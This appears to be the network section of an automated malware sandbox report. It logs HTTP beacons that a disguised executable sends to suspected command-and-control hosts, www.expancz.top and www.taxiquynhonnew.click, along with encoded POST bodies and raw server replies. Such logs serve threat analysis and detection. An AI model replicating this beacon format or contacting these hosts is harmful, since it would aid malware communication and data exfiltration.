                                                  Data Raw: 6a 48 6d 34 47 58 72 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 78 33 4b 7a 73 6f 71 45 5a 64 74 68 31 76 42 58 57 71 48 55 58 54 75 39 45 2b 59 50 50 65 45 70 75 41 4a 49 7a 4c 76 73 47 62 62 2b 31 78 7a 78 51 56 63 38 74 4d 56 6b 55 38 62 61 34 49 6b 46 33 4d 44 63 31 74 4a 6f 41 75 7a 5a 36 67 45 4e 54 52 6f 69 65 6d 65 4f 4e 59 2f 70 63 54 67 49 52 66 58 72 69 4a 54 37 32 75 46 30 65 48 42 53 77 76 6d 78 4f 77 71 76 71 70 34 61 54 59 4b 79 6e 6f 4d 69 65 6e 66 42 47 36 4d 65 59 2b 63 50 34 70 6b 4c 54 43 30 79 5a 51 32 6d 6f 59 64 42 36 4a 46 6c 74 36 53 58 77 77 54 30 6a 71 78 63 63 32 4a 74 6e 51 3d 3d
                                                  Data Ascii: jHm4GXr=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLTC0yZQ2moYdB6JFlt6SXwwT0jqxcc2JtnQ==
                                                  Dec 10, 2024 14:22:29.647928953 CET697INHTTP/1.1 405 Not Allowed
                                                  Server: nginx
                                                  Date: Tue, 10 Dec 2024 13:22:29 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 552
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  2192.168.2.1149914107.155.56.3080732C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 10, 2024 14:22:30.905369997 CET826OUTPOST /2gcl/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.expancz.top
                                                  Origin: http://www.expancz.top
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Content-Length: 224
                                                  Cache-Control: max-age=0
                                                  Referer: http://www.expancz.top/2gcl/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Data Raw: 6a 48 6d 34 47 58 72 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 79 57 61 7a 71 4a 71 45 62 39 74 69 77 76 42 58 59 36 48 51 58 55 6d 39 45 2f 64 4b 50 73 67 70 67 43 52 49 79 4f 54 73 49 37 62 2b 2b 52 7a 30 55 56 63 37 74 4d 59 5a 55 34 62 61 34 4d 45 46 33 49 50 63 31 65 68 6e 44 65 7a 62 68 51 45 50 4d 68 6f 69 65 6d 65 4f 4e 59 44 50 63 53 49 49 52 73 50 72 77 39 48 34 31 75 46 33 5a 48 42 53 30 76 6d 4c 4f 77 71 64 71 6f 6b 77 54 61 79 79 6e 73 41 69 65 32 66 43 52 4b 4d 45 63 2b 63 5a 32 4b 4e 6c 62 43 56 43 63 78 53 4c 68 49 4a 35 79 76 49 2f 39 5a 62 41 7a 6a 62 32 33 4d 51 73 56 48 73 6b 38 64 49 58 52 47 42 51 6f 6c 63 2f 66 33 55 57 79 70 2b 7a 62 48 49 3d
                                                  Data Ascii: jHm4GXr=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsgpgCRIyOTsI7b++Rz0UVc7tMYZU4ba4MEF3IPc1ehnDezbhQEPMhoiemeONYDPcSIIRsPrw9H41uF3ZHBS0vmLOwqdqokwTayynsAie2fCRKMEc+cZ2KNlbCVCcxSLhIJ5yvI/9ZbAzjb23MQsVHsk8dIXRGBQolc/f3UWyp+zbHI=
                                                  Dec 10, 2024 14:22:32.432938099 CET697INHTTP/1.1 405 Not Allowed
                                                  Server: nginx
                                                  Date: Tue, 10 Dec 2024 13:22:32 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 552
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.1149921107.155.56.3080732C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 10, 2024 14:22:33.582700014 CET1839OUTPOST /2gcl/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.expancz.top
                                                  Origin: http://www.expancz.top
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Content-Length: 1236
                                                  Cache-Control: max-age=0
                                                  Referer: http://www.expancz.top/2gcl/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Data Raw: 6a 48 6d 34 47 58 72 3d 34 4b 4d 4d 57 76 4a 58 74 4e 49 44 79 57 61 7a 71 4a 71 45 62 39 74 69 77 76 42 58 59 36 48 51 58 55 6d 39 45 2f 64 4b 50 73 6f 70 67 78 5a 49 7a 70 48 73 4c 37 62 2b 7a 78 7a 31 55 56 63 71 74 4d 41 56 55 35 6d 74 34 4b 49 46 78 62 48 63 6c 76 68 6e 59 4f 7a 62 2b 67 45 4d 54 52 6f 7a 65 6d 4f 4b 4e 59 7a 50 63 53 49 49 52 72 33 72 79 70 54 34 7a 75 46 30 65 48 42 57 77 76 6e 46 4f 30 47 4e 71 6f 51 4b 54 4c 53 79 69 34 73 69 63 45 48 43 54 71 4d 61 53 65 64 61 32 4b 52 6d 62 43 49 37 63 78 6d 68 68 4b 5a 35 33 2b 74 2b 68 36 76 69 6c 51 33 6a 73 2b 73 75 4b 55 51 7a 31 4f 51 54 61 45 78 45 74 6a 67 53 54 43 64 2b 70 72 53 55 4d 69 66 48 31 4b 65 32 66 7a 4a 47 78 50 61 4d 58 76 36 30 6c 62 4c 32 51 39 67 6a 6b 48 50 6b 53 6b 4e 54 66 66 6a 63 2f 6f 33 41 35 54 73 78 48 59 48 53 51 30 6b 71 2b 47 73 64 63 76 73 4e 67 64 6f 39 51 54 71 68 56 2b 35 7a 37 2f 70 34 45 70 47 4a 48 71 41 6a 52 4c 49 52 2b 35 4b 36 4e 55 44 5a 4e 62 64 6d 70 6c 78 32 46 46 59 5a 48 54 4c 6a 5a 32 [TRUNCATED]
                                                  Data Ascii: jHm4GXr=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsopgxZIzpHsL7b+zxz1UVcqtMAVU5mt4KIFxbHclvhnYOzb+gEMTRozemOKNYzPcSIIRr3rypT4zuF0eHBWwvnFO0GNqoQKTLSyi4sicEHCTqMaSeda2KRmbCI7cxmhhKZ53+t+h6vilQ3js+suKUQz1OQTaExEtjgSTCd+prSUMifH1Ke2fzJGxPaMXv60lbL2Q9gjkHPkSkNTffjc/o3A5TsxHYHSQ0kq+GsdcvsNgdo9QTqhV+5z7/p4EpGJHqAjRLIR+5K6NUDZNbdmplx2FFYZHTLjZ2uENQ82BeT4xf5FpIa25PHSiG7jVXrYaoI5ym5sgQeQ5yp6e8zBqMq637ySr7YPKMU7QCxOW7+nGdn3sLr6829YO2bqeuMcbZdLEvvZUv5p33FnmIpWp40VNIJqcMM+dCAbz7OoZQ/cG2298voQBhH7aWc+tGK4xQ2oFjHL5cLTTNjHVJaUx5ySWbrC0Hqq+2CuIYCPAENSUg7BQwMIcXn/YkdUeK8NyDw1AHlTqwaktQlJDCzbgyGKf3zEgyh5jXFj981IQmJMI37EJTAaRkwOC0YMW4at9JaLuPVSd3QKBRW7nmZ1y37ZezP4LAWMGUVD8kngDGVbG9l4O5RIoSqnV3PtTJDjVhM/SU74cpfaYzrgebaUO5PigNGU4tMu4KGoSyGethoiWXAhV2eC0pqKI3/dOseAuR4Y9rjSodkaAynNWV4sMHNuG6J2pVjcI+IBe3+FRrNAJle8nMWnTdMTE+25xrzsIb9g0EI8nn77/RlYo3Hv4Asr9Ecp5VQY1fnJjQJ2RCjx4WXsJtndugnOA5P5Q0Z4Vj1nmhC0OlP7vHy+mS7w8Pxtn1e9UKZBjB9p7Y+3OqvBskPcU4O85WKAml+dsF7Y6KEeye0UTBbBk4NhZYuuoX6jL2t4X56slyKBcr1hAjHqbr/L0v92DRnSMG7lecu9CMag [TRUNCATED]
                                                  Dec 10, 2024 14:22:35.131866932 CET697INHTTP/1.1 405 Not Allowed
                                                  Server: nginx
                                                  Date: Tue, 10 Dec 2024 13:22:34 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 552
                                                  Connection: close
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 [TRUNCATED]
                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.1149928107.155.56.3080732C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 10, 2024 14:22:36.302843094 CET543OUTGET /2gcl/?jHm4GXr=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmdZfz0RhpRCYzUVnPO/bDdiFFJaWY/Yn51Jw=&2z=xX0xzrrpPjmP HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Host: www.expancz.top
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Dec 10, 2024 14:22:37.852586985 CET1236INHTTP/1.1 200 OK
                                                  Server: nginx
                                                  Date: Tue, 10 Dec 2024 13:22:37 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 9651
                                                  Last-Modified: Fri, 15 Nov 2024 02:47:44 GMT
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  ETag: "6736b650-25b3"
                                                  Accept-Ranges: bytes
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 6b 65 79 77 6f 72 64 73 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 79 70 65 20 63 6f 6e 74 65 6e 74 3d 77 65 62 73 69 74 65 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 74 69 74 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 20 63 6f 6e 74 65 6e 74 3d [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html><html><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no"><meta name=keywords content=""><meta name=description content=""><meta property=og:type content=website><meta property=og:title content=""><meta property=og:description content=""><meta property=og:url content=""><meta property=og:image content=""><meta name=HandheldFriendly content=true><meta name=apple-mobile-web-app-capable content=yes><meta name=apple-mobile-web-app-status-bar-style content=black><meta name=format-detection content="telphone=no, email=no"><meta name=screen-orientation content=portrait><meta name=x5-orientation content=portrait><meta name=full-screen content=yes><meta name=x5-fullscreen content=true><meta name=browsermode content=application><meta name=x5-page-mode content=app><meta name=msapplication-tap-highlight content=no><meta http-equiv=X-UA-Compatible content="ie=edge"><link href=https:
                                                  Dec 10, 2024 14:22:37.852600098 CET224INData Raw: 2f 2f 6c 33 66 69 6c 65 6a 73 6f 6e 34 64 76 64 2e 6a 6f 73 79 6c 69 76 69 6e 67 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 20 74 79 70 65 3d 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 20 72 65 6c 3d 69 63 6f 6e 3e 3c 73 74 79 6c 65 3e 23 50 4f 50
                                                  Data Ascii: //l3filejson4dvd.josyliving.com/favicon.ico type=image/x-icon rel=icon><style>#POP800_INIT_DIV { display: none!important; } #POP800_PANEL_DIV { display: none!important; } #POP800_LEAVEWORD_DIV {
                                                  Dec 10, 2024 14:22:37.852612019 CET1236INData Raw: 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 7d 3c 2f 73 74 79 6c 65 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 69 73 41 74 6d 20 3d 20 66 61 6c 73 65 3b 0a 20 20 20 20 69 66 20 28 67 65 74 51
                                                  Data Ascii: display: none!important; }</style><script>var isAtm = false; if (getQueryVariable('atm') === '1') { isAtm = true; } var fb_id = ''; var google_id = ''; var cl = ''; var dSource = ''; // search
                                                  Dec 10, 2024 14:22:37.852720976 CET1236INData Raw: 28 29 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2f 2f e9 87 87 e7 94 a8 e5 90 8c e6 ad a5 e5 8a a0 e8 bd bd 0a 20 20 20 20 20 20 78 6d 6c 48 74 74 70 2e 6f 70 65 6e 28 22 47 45 54 22 2c 75 72 6c 2c 66 61 6c 73 65 29 3b 0a 20 20 20 20 20 20
                                                  Data Ascii: (); } // xmlHttp.open("GET",url,false); //ChromeOpera xmlHttp.send(null); //4
                                                  Dec 10, 2024 14:22:37.852734089 CET1236INData Raw: 62 35 78 6c 63 74 37 74 77 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 27 20 3a 20 27 68 74 74 70 73 3a 2f 2f 64 71 30 69 62 35 78 6c 63 74 37 74 77 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 27 3b 0a 20 20 20 20 69 66 20 28 67 65 74 51
                                                  Data Ascii: b5xlct7tw.cloudfront.net/' : 'https://dq0ib5xlct7tw.cloudfront.net/'; if (getQueryVariable('path')) { pathInfo = getQueryVariable('path'); loadJs('pixelJs',baseJsUrl + pathInfo.substr(0,1).toLowerCase() + '/' + pathInfo.substr(
                                                  Dec 10, 2024 14:22:37.852747917 CET1236INData Raw: 3e 3c 73 63 72 69 70 74 3e 69 66 28 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 6f 75 72 63 65 20 3d 3d 3d 20 73 6f 75 72 63 65 44 61 74 61 2e 66 61 63 65 62 6f 6f 6b 53 6f 75 72 63 65 29 20 7b 0a 20 20 20 20 20 20 21 20 66 75 6e 63 74 69 6f 6e 20
                                                  Data Ascii: ><script>if(localStorage.source === sourceData.facebookSource) { ! function (f, b, e, v, n, t, s) { if (f.fbq) return; n = f.fbq = function () { n.callMethod ? n.callMethod.apply(n, argu
                                                  Dec 10, 2024 14:22:37.852854967 CET1236INData Raw: 6e 63 65 73 22 2c 20 22 64 65 62 75 67 22 2c 20 22 6f 6e 22 2c 20 22 6f 66 66 22 2c 20 22 6f 6e 63 65 22 2c 20 22 72 65 61 64 79 22 2c 20 22 61 6c 69 61 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 22 67 72 6f 75 70 22 2c 20 22 65 6e 61 62 6c 65 43
                                                  Data Ascii: nces", "debug", "on", "off", "once", "ready", "alias", "group", "enableCookie", "disableCookie" ], ttq.setAndDefer = function(t, e) { t[e] = function() { t.push([e].concat(Array.prototype.slice.call(argu
                                                  Dec 10, 2024 14:22:37.852868080 CET1236INData Raw: 20 74 74 71 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 74 72 61 63 6b 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 67 48 65 61 64 20 3d 20 64
                                                  Data Ascii: ttq = { track: function () {} } }</script><script>var gHead = document.getElementsByTagName('head')[0]; var gScript = document.createElement("script"); gScript.type = "text/javascript"; gScript.src="https://www.g
                                                  Dec 10, 2024 14:22:37.852880001 CET1026INData Raw: 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 2f 2f 20 e9 98 bb e6 ad a2 e5 8f 8c e5 87 bb e6 94 be e5 a4 a7 0a 20 20 20 20 20 20 76 61 72 20 6c 61 73 74 54 6f 75 63 68 45 6e 64 20 3d 20 30 3b 0a 20 20 20 20
                                                  Data Ascii: ndow.onload = function () { // var lastTouchEnd = 0; document.addEventListener('touchstart', function (event) { if (event.touches.length > 1) { event.preventDefault(); } });


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.114994713.228.81.3980732C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 10, 2024 14:22:44.137403011 CET833OUTPOST /y49d/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.taxiquynhonnew.click
                                                  Origin: http://www.taxiquynhonnew.click
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Content-Length: 204
                                                  Cache-Control: max-age=0
                                                  Referer: http://www.taxiquynhonnew.click/y49d/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                  Data Raw: 6a 48 6d 34 47 58 72 3d 72 34 72 4b 63 69 62 56 53 78 34 76 42 51 52 5a 42 77 42 61 4e 6f 4c 76 62 42 4e 47 68 73 2b 47 2f 50 48 7a 76 6f 6b 64 41 6e 63 75 4f 37 4b 34 58 41 58 68 4a 58 70 6e 7a 36 33 66 2f 2f 54 7a 49 4d 34 53 56 47 30 39 72 68 70 34 63 6f 52 7a 53 67 44 6a 65 6e 2b 43 6a 31 4f 38 6a 65 55 63 32 63 69 75 58 72 64 65 61 56 54 59 77 72 6f 49 78 39 4a 35 53 2b 32 71 64 53 71 55 66 42 74 59 64 76 33 57 38 52 72 59 55 51 57 56 36 4d 67 37 51 59 49 59 67 55 79 77 7a 6e 76 6d 47 39 64 51 6b 45 58 56 34 4c 66 76 58 43 35 47 48 53 49 69 72 2f 53 71 68 64 55 46 66 66 77 67 37 68 41 4b 72 41 3d 3d
                                                  Data Ascii: jHm4GXr=r4rKcibVSx4vBQRZBwBaNoLvbBNGhs+G/PHzvokdAncuO7K4XAXhJXpnz63f//TzIM4SVG09rhp4coRzSgDjen+Cj1O8jeUc2ciuXrdeaVTYwroIx9J5S+2qdSqUfBtYdv3W8RrYUQWV6Mg7QYIYgUywznvmG9dQkEXV4LfvXC5GHSIir/SqhdUFffwg7hAKrA==
                                                  Dec 10, 2024 14:22:45.709861994 CET371INHTTP/1.1 301 Moved Permanently
                                                  Server: openresty
                                                  Date: Tue, 10 Dec 2024 13:22:45 GMT
                                                  Content-Type: text/html
                                                  Content-Length: 166
                                                  Connection: close
                                                  Location: https://www.taxiquynhonnew.click/y49d/
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.114995413.228.81.3980732C:\Program Files (x86)\WEDCVRceEcoELDgXGOGbIWZniqNToXCsfkMGoBVW\FeNbdhmZHKN.exe
                                                  TimestampBytes transferredDirectionData
                                                  Dec 10, 2024 14:22:46.811913967 CET853OUTPOST /y49d/ HTTP/1.1
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                  Accept-Language: en-US,en;q=0.9
                                                  Accept-Encoding: gzip, deflate, br
                                                  Host: www.taxiquynhonnew.click
                                                  Origin: http://www.taxiquynhonnew.click
                                                  Connection: close
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Content-Length: 224
                                                  Cache-Control: max-age=0
                                                  Referer: http://www.taxiquynhonnew.click/y49d/
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
